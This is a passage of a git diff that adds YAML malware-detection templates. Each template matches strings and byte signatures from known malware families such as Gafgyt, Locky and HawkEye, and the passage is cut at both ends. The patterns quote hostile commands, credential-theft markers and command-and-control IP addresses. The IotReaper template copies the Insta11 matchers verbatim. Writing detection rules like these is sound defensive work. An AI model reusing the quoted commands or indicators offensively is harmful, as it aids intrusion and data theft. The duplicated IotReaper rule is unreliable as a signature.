+ name: FUDCrypt Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/gigajew/FudCrypt/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'OcYjzPUtJkNbLOABqYvNbvhZf' + - 'gwiXxyIDDtoYzgMSRGMckRbJi' + - 'BclWgISTcaGjnwrzSCIuKruKm' + - 'CJyUSiUNrIVbgksjxpAMUkAJJ' + - 'fAMVdoPUEyHEWdxQIEJPRYbEN' + - 'CIGQUctdcUPqUjoucmcoffECY' + - 'wcZfHOgetgAExzSoWFJFQdAyO' + - 'DqYKDnIoLeZDWYlQWoxZnpfPR' + - 'MkhMoOHCbGUMqtnRDJKnBYnOj' + - 'sHEqLMGglkBAOIUfcSAgMvZfs' + - 'JtZApJhbFAIFxzHLjjyEQvtgd' + - 'IIQrSWZEMmoQIKGuxxwoTwXka' \ No newline at end of file diff --git a/file/malware/gafgyt-bash-malware.yaml b/file/malware/gafgyt-bash-malware.yaml new file mode 100644 index 0000000000..89b33c0f3d --- /dev/null +++ b/file/malware/gafgyt-bash-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-bash-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'PONG!' + - 'GETLOCALIP' + - 'HTTPFLOOD' + - 'LUCKYLILDUDE' + condition: and \ No newline at end of file diff --git a/file/malware/gafgyt-generic-malware.yaml b/file/malware/gafgyt-generic-malware.yaml new file mode 100644 index 0000000000..0f1cf80b47 --- /dev/null +++ b/file/malware/gafgyt-generic-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-generic-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "/bin/busybox;echo -e 'gayfgt'" + - '/proc/net/route' + - 'admin' + - 'root' + condition: and \ No newline at end of file diff --git a/file/malware/gafgyt-hihi-malware.yaml b/file/malware/gafgyt-hihi-malware.yaml new file mode 100644 index 0000000000..61375a18ac --- /dev/null +++ b/file/malware/gafgyt-hihi-malware.yaml @@ -0,0 +1,24 @@ +id: gafgyt-hihi-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PONG' + - 'TELNET LOGIN CRACKED - %s:%s:%s' + - 'ADVANCEDBOT' + - '46.166.185.92' + - 'LOLNOGTFO' + condition: and \ No newline at end of file diff --git a/file/malware/gafgyt-hoho-malware.yaml b/file/malware/gafgyt-hoho-malware.yaml new file mode 100644 index 0000000000..f41ce24284 --- /dev/null +++ b/file/malware/gafgyt-hoho-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-hoho-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PRIVMSG' + - 'Remote IRC Bot' + - '23.95.43.182' + condition: and \ No newline at end of file diff --git a/file/malware/gafgyt-jackmy-malware.yaml b/file/malware/gafgyt-jackmy-malware.yaml new file mode 100644 index 0000000000..5db0722050 --- /dev/null +++ b/file/malware/gafgyt-jackmy-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-jackmy-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PONG' + - 'jackmy' + - '203.134.%d.%d' + condition: and \ No newline at end of file diff --git a/file/malware/gafgyt-oh-malware.yaml b/file/malware/gafgyt-oh-malware.yaml new file mode 100644 index 0000000000..1fbc949209 --- /dev/null +++ b/file/malware/gafgyt-oh-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-oh-malware + +info: + name: Gafgyt Oh Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'busyboxterrorist' + - 'BOGOMIPS' + - '124.105.97.%d' + - 'fucknet' + condition: and \ No newline at end of file diff --git a/file/malware/genome-malware.yaml b/file/malware/genome-malware.yaml new file mode 100644 index 0000000000..4d2f018030 --- /dev/null +++ b/file/malware/genome-malware.yaml @@ -0,0 +1,21 @@ +id: genome-malware + +info: + name: Genome Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Attempting to create more than one keyboard::Monitor instance' + - '{Right windows}' + - 'Access violation - no RTTI data!' + condition: and \ No newline at end of file diff --git a/file/malware/glass-malware.yaml b/file/malware/glass-malware.yaml new file mode 100644 index 0000000000..4729c20f2d --- /dev/null +++ b/file/malware/glass-malware.yaml @@ -0,0 +1,22 @@ +id: glass-malware + +info: + name: Glass Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "PostQuitMessage" + - "pwlfnn10,gzg" + - "update.dll" + - "_winver" + condition: and diff --git a/file/malware/glasses-malware.yaml b/file/malware/glasses-malware.yaml new file mode 100644 index 0000000000..9dd8240a7d --- /dev/null +++ b/file/malware/glasses-malware.yaml @@ -0,0 +1,30 @@ +id: glasses-malware + +info: + name: Glasses Malware - Detect + author: daffainfo + severity: info + reference: + - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'thequickbrownfxjmpsvalzydg' + - 'Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)' + - '" target="NewRef">' + condition: and + + - type: binary + binary: + - "B8ABAAAAAAF7E1D1EA8D04522BC8" + - "B856555555F7E98B4C241C8BC2C1E81F03D0493BCA" + condition: or \ No newline at end of file diff --git a/file/malware/gozi-malware.yaml b/file/malware/gozi-malware.yaml new file mode 100644 index 0000000000..0de45dd78e --- /dev/null +++ b/file/malware/gozi-malware.yaml @@ -0,0 +1,19 @@ +id: gozi-malware + +info: + name: Gozi Malware - Detect + author: daffainfo + severity: info + reference: + - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500" \ No newline at end of file diff --git a/file/malware/gpgqwerty-malware.yaml b/file/malware/gpgqwerty-malware.yaml new file mode 100644 index 0000000000..98fc738eda --- /dev/null +++ b/file/malware/gpgqwerty-malware.yaml @@ -0,0 +1,22 @@ +id: gpgqwerty-malware + +info: + name: GPGQwerty Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "gpg.exe –recipient qwerty -o" + - "%s%s.%d.qwerty" + - "del /Q /F /S %s$recycle.bin" + - "cryz1@protonmail.com" + condition: and \ No newline at end of file diff --git a/file/malware/greame-malware.yaml b/file/malware/greame-malware.yaml new file mode 100644 index 0000000000..c87fb4e61f --- /dev/null +++ b/file/malware/greame-malware.yaml @@ -0,0 +1,31 @@ +id: greame-malware + +info: + name: Greame Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "EditSvr" + - "TLoader" + - "Stroks" + - "Avenger by NhT" + - "####@####" + - "GREAME" + condition: and + + - type: binary + binary: + - "232323234023232323E8EEE9F9232323234023232323" + - "232323234023232323FAFDF0EFF9232323234023232323" + condition: and \ No newline at end of file diff --git a/file/malware/grozlex-malware.yaml b/file/malware/grozlex-malware.yaml new file mode 100644 index 0000000000..86893d6184 --- /dev/null +++ b/file/malware/grozlex-malware.yaml @@ -0,0 +1,19 @@ +id: grozlex-malware + +info: + name: Grozlex Malware - Detect + author: daffainfo + severity: info + reference: + - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E" \ No newline at end of file diff --git a/file/malware/hawkeye-malware.yaml b/file/malware/hawkeye-malware.yaml new file mode 100644 index 0000000000..734d77c765 --- /dev/null +++ b/file/malware/hawkeye-malware.yaml @@ -0,0 +1,27 @@ +id: hawkeye-malware + +info: + name: HawkEye Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "HawkEyeKeylogger" + - "099u787978786" + - "HawkEye_Keylogger" + - "holdermail.txt" + - "wallet.dat" + - "Keylog Records" + - "" + - "\\pidloc.txt" + - "BSPLIT" + condition: and diff --git a/file/malware/imminent-malware.yaml b/file/malware/imminent-malware.yaml new file mode 100644 index 0000000000..e093fb86f8 --- /dev/null +++ b/file/malware/imminent-malware.yaml @@ -0,0 +1,37 @@ +id: imminent-malware + +info: + name: Imminent Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "DecodeProductKey" + - "StartHTTPFlood" + - "CodeKey" + - "MESSAGEBOX" + - "GetFilezillaPasswords" + - "DataIn" + - "UDPzSockets" + condition: and + + - type: word + part: raw + words: + - "k__BackingField" + - "k__BackingField" + - "DownloadAndExecute" + - "england.png" + - "-CHECK & PING -n 2 127.0.0.1 & EXIT" + - "Showed Messagebox" + condition: and \ No newline at end of file diff --git a/file/malware/infinity-malware.yaml b/file/malware/infinity-malware.yaml new file mode 100644 index 0000000000..e831343139 --- /dev/null +++ b/file/malware/infinity-malware.yaml @@ -0,0 +1,26 @@ +id: infinity-malware + +info: + name: Infinity Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "CRYPTPROTECT_PROMPTSTRUCT" + - "discomouse" + - "GetDeepInfo" + - "AES_Encrypt" + - "StartUDPFlood" + - "BATScripting" + - "FBqINhRdpgnqATxJ.html" + - "magic_key" + condition: and \ No newline at end of file diff --git a/file/malware/insta11-malware.yaml b/file/malware/insta11-malware.yaml new file mode 100644 index 0000000000..97870e5da4 --- /dev/null +++ b/file/malware/insta11-malware.yaml @@ -0,0 +1,28 @@ +id: insta11-malware + +info: + name: Insta11 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - 'XTALKER7' + - 'Insta11 Microsoft' + - 'wudMessage' + - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1' + - 'B12AE898-D056-4378-A844-6D393FE37956' + condition: or + + - type: binary + binary: + - 'E9000000006823040000' \ No newline at end of file diff --git a/file/malware/intel-virtualization-malware.yaml b/file/malware/intel-virtualization-malware.yaml new file mode 100644 index 0000000000..650f218f8f --- /dev/null +++ b/file/malware/intel-virtualization-malware.yaml @@ -0,0 +1,29 @@ +id: intel-virtualization-malware + +info: + name: Intel Virtualization Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: binary + binary: + - '4C6F6164535452494E47' + - '496E697469616C697A654B6579486F6F6B' + - '46696E645265736F7572636573' + - '4C6F6164535452494E4746726F6D484B4355' + - '6863637574696C732E444C4C' + condition: and + + - type: binary + binary: + - '483A5C466173745C506C756728686B636D64295C' + - '646C6C5C52656C656173655C48696A61636B446C6C2E706462' + condition: and \ No newline at end of file diff --git a/file/malware/iotreaper-malware.yaml b/file/malware/iotreaper-malware.yaml new file mode 100644 index 0000000000..d64ea0d220 --- /dev/null +++ b/file/malware/iotreaper-malware.yaml @@ -0,0 +1,28 @@ +id: iotreaper-malware + +info: + name: IotReaper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - 'XTALKER7' + - 'Insta11 Microsoft' + - 'wudMessage' + - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1' + - 'B12AE898-D056-4378-A844-6D393FE37956' + condition: or + + - type: binary + binary: + - 'E9000000006823040000' \ No newline at end of file diff --git a/file/malware/linux-aesddos-malware.yaml b/file/malware/linux-aesddos-malware.yaml new file mode 100644 index 0000000000..389b681e8b --- /dev/null +++ b/file/malware/linux-aesddos-malware.yaml @@ -0,0 +1,37 @@ +id: linux-aesddos-malware + +info: + name: Linux AESDDOS Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "3AES" + - "Hacker" + condition: and + + - type: word + part: raw + words: + - "3AES" + - "VERSONEX" + condition: and + + - type: word + part: raw + words: + - "VERSONEX" + - "Hacker" + condition: and diff --git a/file/malware/linux-billgates-malware.yaml b/file/malware/linux-billgates-malware.yaml new file mode 100644 index 0000000000..24ec63d673 --- /dev/null +++ b/file/malware/linux-billgates-malware.yaml @@ -0,0 +1,22 @@ +id: linux-billgates-malware + +info: + name: Linux BillGates Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429 + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "12CUpdateGates" + - "11CUpdateBill" + condition: and diff --git a/file/malware/linux-elknot-malware.yaml b/file/malware/linux-elknot-malware.yaml new file mode 100644 index 0000000000..2a4e11bb7a --- /dev/null +++ b/file/malware/linux-elknot-malware.yaml @@ -0,0 +1,22 @@ +id: linux-elknot-malware + +info: + name: Linux Elknot Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099 + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "ZN8CUtility7DeCryptEPciPKci" + - "ZN13CThreadAttack5StartEP11CCmdMessage" + condition: and diff --git a/file/malware/linux-mrblack-malware.yaml b/file/malware/linux-mrblack-malware.yaml new file mode 100644 index 0000000000..6b67dda9f9 --- /dev/null +++ b/file/malware/linux-mrblack-malware.yaml @@ -0,0 +1,22 @@ +id: linux-mrblack-malware + +info: + name: Linux MrBlack Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Mr.Black" + - "VERS0NEX:%s|%d|%d|%s" + condition: and diff --git a/file/malware/linux-tsunami-malware.yaml b/file/malware/linux-tsunami-malware.yaml new file mode 100644 index 0000000000..2f89e2327e --- /dev/null +++ b/file/malware/linux-tsunami-malware.yaml @@ -0,0 +1,22 @@ +id: linux-tsunami-malware + +info: + name: Linux Tsunami Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "PRIVMSG %s :[STD]Hitting %s" + - "NOTICE %s :TSUNAMI " + - "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually." diff --git a/file/malware/locky-malware.yaml b/file/malware/locky-malware.yaml new file mode 100644 index 0000000000..248e653c88 --- /dev/null +++ b/file/malware/locky-malware.yaml @@ -0,0 +1,31 @@ +id: locky-malware + +info: + name: Locky Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "45b899f7f90faf45b88945b8" + - "2b0a0faf4df8894df8c745" + condition: and + + - type: binary + binary: + - "2E006C006F0063006B00790000" + - "005F004C006F0063006B007900" + - "5F007200650063006F00760065" + - "0072005F0069006E0073007400" + - "720075006300740069006F006E" + - "0073002E0074007800740000" + - "536F6674776172655C4C6F636B7900" + condition: and \ No newline at end of file diff --git a/file/malware/lostdoor-malware.yaml b/file/malware/lostdoor-malware.yaml new file mode 100644 index 0000000000..e68a90d5b2 --- /dev/null +++ b/file/malware/lostdoor-malware.yaml @@ -0,0 +1,32 @@ +id: lostdoor-malware + +info: + name: LostDoor Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "*mlt* = %" + - "*ip* = %" + - "*victimo* = %" + - "*name* = %" + - "[START]" + - "[DATA]" + - "We Control Your Digital World" + - "RC4Initialize" + - "RC4Decrypt" + condition: and + + - type: binary + binary: + - "0D0A2A454449545F5345525645522A0D0A" \ No newline at end of file diff --git a/file/malware/luminositylink-malware.yaml b/file/malware/luminositylink-malware.yaml new file mode 100644 index 0000000000..f3076fb6af --- /dev/null +++ b/file/malware/luminositylink-malware.yaml @@ -0,0 +1,29 @@ +id: luminositylink-malware + +info: + name: LuminosityLink Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "SMARTLOGS" + - "RUNPE" + - "b.Resources" + - "CLIENTINFO*" + - "Invalid Webcam Driver Download URL, or Failed to Download File!" + - "Proactive Anti-Malware has been manually activated!" + - "REMOVEGUARD" + - "C0n1f8" + - "Luminosity" + - "LuminosityCryptoMiner" + - "MANAGER*CLIENTDETAILS*" + condition: and \ No newline at end of file diff --git a/file/malware/luxnet-malware.yaml b/file/malware/luxnet-malware.yaml new file mode 100644 index 0000000000..4fca112cf0 --- /dev/null +++ b/file/malware/luxnet-malware.yaml @@ -0,0 +1,24 @@ +id: luxnet-malware + +info: + name: LuxNet Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "GetHashCode" + - "Activator" + - "WebClient" + - "op_Equality" + - "dickcursor.cur" + - "{0}|{1}|{2}" + condition: and \ No newline at end of file diff --git a/file/malware/macgyver-installer-malware.yaml b/file/malware/macgyver-installer-malware.yaml new file mode 100644 index 0000000000..ddad8de9c5 --- /dev/null +++ b/file/malware/macgyver-installer-malware.yaml @@ -0,0 +1,24 @@ +id: macgyver-installer-malware + +info: + name: MacGyver.cap Installer Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "delete -AID 315041592e5359532e4444463031" + - "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" + - "-mac_key 404142434445464748494a4b4c4d4e4f" + - "-enc_key 404142434445464748494a4b4c4d4e4f" + condition: and \ No newline at end of file diff --git a/file/malware/macgyver-malware.yaml b/file/malware/macgyver-malware.yaml new file mode 100644 index 0000000000..c56023d78b --- /dev/null +++ b/file/malware/macgyver-malware.yaml @@ -0,0 +1,27 @@ +id: macgyver-malware + +info: + name: MacGyver.cap Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "src/MacGyver/javacard/Header.cap" + - "src/MacGyver/javacard/Directory.cap" + - "src/MacGyver/javacard/Applet.cap" + - "src/MacGyver/javacard/Import.cap" + - "src/MacGyver/javacard/ConstantPool.cap" + - "src/MacGyver/javacard/Class.cap" + - "src/MacGyver/javacard/Method.cap" + condition: and \ No newline at end of file diff --git a/file/malware/madness-malware.yaml b/file/malware/madness-malware.yaml new file mode 100644 index 0000000000..8ab243f4a9 --- /dev/null +++ b/file/malware/madness-malware.yaml @@ -0,0 +1,28 @@ +id: madness-malware + +info: + name: Madness DDOS Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/arbor/yara/blob/master/madness.yara + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Madness.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE" + - "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==" + - "document.cookie=" + - "[\"cookie\",\"" + - "\"realauth=" + - "\"location\"];" + - "d3Rm" + - "ZXhl" + condition: and \ No newline at end of file diff --git a/file/malware/miner--malware.yaml b/file/malware/miner--malware.yaml new file mode 100644 index 0000000000..50884f91ce --- /dev/null +++ b/file/malware/miner--malware.yaml @@ -0,0 +1,19 @@ +id: miner-malware + +info: + name: Miner Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "stratum+tcp" + - "stratum+udp" \ No newline at end of file diff --git a/file/malware/miniasp3-malware.yaml b/file/malware/miniasp3-malware.yaml new file mode 100644 index 0000000000..318b0f6d90 --- /dev/null +++ b/file/malware/miniasp3-malware.yaml @@ -0,0 +1,59 @@ +id: miniasp3-malware + +info: + name: MiniASP3 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "open internet failed…" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "run error!" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "run ok!" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "time out,change to mode 0" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "command is null!" + condition: and diff --git a/file/malware/naikon-malware.yaml b/file/malware/naikon-malware.yaml new file mode 100644 index 0000000000..bd0ac87b0d --- /dev/null +++ b/file/malware/naikon-malware.yaml @@ -0,0 +1,31 @@ +id: naikon-malware + +info: + name: Naikon Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "0FAFC1C1E01F" + - "355A010000" + - "81C27F140600" + condition: and + + - type: word + part: raw + words: + - "NOKIAN95/WEB" + - "/tag=info&id=15" + - "skg(3)=&3.2d_u1" + - "\\Temp\\iExplorer.exe" + - "\\Temp\\\"TSG\"" + condition: or diff --git a/file/malware/naspyupdate-malware.yaml b/file/malware/naspyupdate-malware.yaml new file mode 100644 index 0000000000..3ac092de7c --- /dev/null +++ b/file/malware/naspyupdate-malware.yaml @@ -0,0 +1,27 @@ +id: naspyupdate-malware + +info: + name: nAspyUpdate Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "8A5424148A0132C202C28801414E75F4" + + - type: word + part: raw + words: + - "\\httpclient.txt" + - "password <=14" + - "/%ldn.txt" + - "Kill You\x00" + condition: or diff --git a/file/malware/notepad-malware.yaml b/file/malware/notepad-malware.yaml new file mode 100644 index 0000000000..6d4880f8f2 --- /dev/null +++ b/file/malware/notepad-malware.yaml @@ -0,0 +1,19 @@ +id: notepad-malware + +info: + name: Notepad v1.1 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "75BAA77C842BE168B0F66C42C7885997" + - "B523F63566F407F3834BCC54AAA32524" \ No newline at end of file diff --git a/file/malware/olyx-malware.yaml b/file/malware/olyx-malware.yaml new file mode 100644 index 0000000000..8bfb443752 --- /dev/null +++ b/file/malware/olyx-malware.yaml @@ -0,0 +1,26 @@ +id: olyx-malware + +info: + name: Olyx Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/Applications/Automator.app/Contents/MacOS/DockLight" + condition: or + + - type: binary + binary: + - "C7400436363636C7400836363636" + - "C740045C5C5C5CC740085C5C5C5C" + condition: or diff --git a/file/malware/osx-leverage-malware.yaml b/file/malware/osx-leverage-malware.yaml new file mode 100644 index 0000000000..47ca40521b --- /dev/null +++ b/file/malware/osx-leverage-malware.yaml @@ -0,0 +1,25 @@ +id: osx-leverage-malware + +info: + name: OSX Leverage Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F" + - "+:Users:Shared:UserEvent.app:Contents:MacOS:" + - "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'" + - "osascript -e 'tell application \"System Events\" to get the hidden of every login item'" + - "osascript -e 'tell application \"System Events\" to get the name of every login item'" + - "osascript -e 'tell application \"System Events\" to get the path of every login item'" + - "serverVisible \x00" + condition: and \ No newline at end of file diff --git a/file/malware/paradox-malware.yaml b/file/malware/paradox-malware.yaml new file mode 100644 index 0000000000..a1e868b53b --- /dev/null +++ b/file/malware/paradox-malware.yaml @@ -0,0 +1,25 @@ +id: paradox-malware + +info: + name: Paradox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "ParadoxRAT" + - "Form1" + - "StartRMCam" + - "Flooders" + - "SlowLaris" + - "SHITEMID" + - "set_Remote_Chat" + condition: and \ No newline at end of file diff --git a/file/malware/plasma-malware.yaml b/file/malware/plasma-malware.yaml new file mode 100644 index 0000000000..f777e38f46 --- /dev/null +++ b/file/malware/plasma-malware.yaml @@ -0,0 +1,27 @@ +id: plasma-malware + +info: + name: Plasma Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Miner: Failed to Inject." + - "Started GPU 